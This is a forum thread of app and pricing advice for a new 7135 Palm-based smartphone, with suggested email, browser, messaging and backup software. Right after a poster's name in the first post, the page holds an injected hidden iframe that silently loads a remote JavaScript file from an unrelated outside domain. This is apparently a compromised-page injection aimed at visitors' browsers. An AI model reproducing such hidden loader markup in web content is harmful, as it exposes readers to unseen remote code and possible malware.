+ Reply to Thread

7135 immient in canada, what should i do first when i get it

what should I install first etc play around with first data phone ever but I am getting it for work related purposes and the fact I work for a wireless carrier here that is carrying it so I want to be a semi-expert.

Dreaderus<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well, take a look at some apps that WON'T work with the 7135 :

http://www.smartphonesource.com/vbul...&threadid=4744

And now, APPS that will work for the 7135(or at least, good ones) :

http://www.smartphonesource.com/vbul...&threadid=3947

Hmmm...you'll have to ask the 7135 owners how to do soft/cold/hard resets (not sure if it's different than a 6035 or not).

Anyone else is welcome to chime in at anytime

A little off-topic, but Dreaderus, is it normal that your carrier subsidizes a phone THAT much? I don't see how they could recoup that much subsidy in less than a year...

Who in Canda carries it?

Bell Mobility will be carrying it

These prices are not final but I have heard it will be $799 canadian without a term and on a 2 year term will be $699, is this completly out of whack to us based prices? just curious

Dreaderus

oh btw, another point, i am completly "clued" when it comes to the smartphone i do not want to be overwhelmed, but maybe a list here of 5-10 essential apps for this phone to start me off, I need to start off slow and get going, you guys know so much about this phone and your gona lose me

Dreaderus

Originally posted by dreaderus
    These prices are not final but I have heard it will be $799 canadian without a term and on a 2 year term will be $699, is this completly out of whack to us based prices? just curious

Dreaderus

Yeah, they are actually...699$ from the "makers" of this phone, and that's in American currency, so factor in the exchange, it's way over 1000$ canadian.

As for apps, free ones, or paid ones or monthly payment ones?

Because usually the best applications are those you pay on a monthly basis, except for Minute Counter

does the provider offer these monthly ones?

just generally billed or not which are good to use for management/etc/neatstuff.

Dreaderus

Well, there's Snappermail or Gopherking for emails.

Xiino or the included EIS browser(but heard it's slow, and I've never had problems with Xiino) for HTML browsing with images

Rlwhitt's Minute Counter

Verichat for msn/icq/aim/yahoo instant messaging (very good program!)

X-master for installing hacks (if you want)

Silkyboard for text entry

I heard there's been some problems with Launcher-X (replaces the default PALM application viewer) with the 7135, but it's still very good, or you can go with either Megalauncher or Silverscreen, both of which are still excellent

For games : Handmark monopoly which I like alot, and there's always Atomsmash

Keep in mind, those are msotly in my opinion, but my opinion's been influenced by everyone else here

No time to actually find all the links, but abit later on I'll edit this post to put the links in, if anyone hasn't done so already

I've found this thread to be an awesome list of Palm app suggestions. Whenever I am feeling like I need to push the boundaries a bit and try something new, I just go back to it, and pick out something else to try. Also, note that halfway down the first page, Nomad7674 posts a link to another awesome thread. So, between those two, you should be able to keep yourself learning for some time. Also, http://www.freewarepalm.com has tons of apps as well. Just pick a category, and read some descriptions to see if it's something you're interested in.

For pricing, all the stuff at the last site is obviously free. Many of the "best of class" apps do cost money, but it's usual for vendors to offer a free trial period, during which you can download the software, install it, and use it for 15 days or 30 uses or whatever they set it to. So once again, look around, pick a few, see what you think of them, then pick a few more after you're done with that batch and have bought the ones you want to keep.

As for compatibility, not everything will work with the 7135, but I think the unit is new enough that many things have not been tried yet. The thread Xc0m posted has what's failed so far. Before you do anything else, I'd strongly recommend getting Backup Buddy (from Blue Nomad) and an SD card, and making a backup of your starting configuration. Whenever you're experimenting with new apps, refresh your backup, so that you have something to fall back to if something goes wrong.

There's a lot to learn, and the best sources are often the sites of the software vendors. Read the FAQ's and installation manuals, and do searches here to see if anyone has talked about an app.

Good luck and have fun!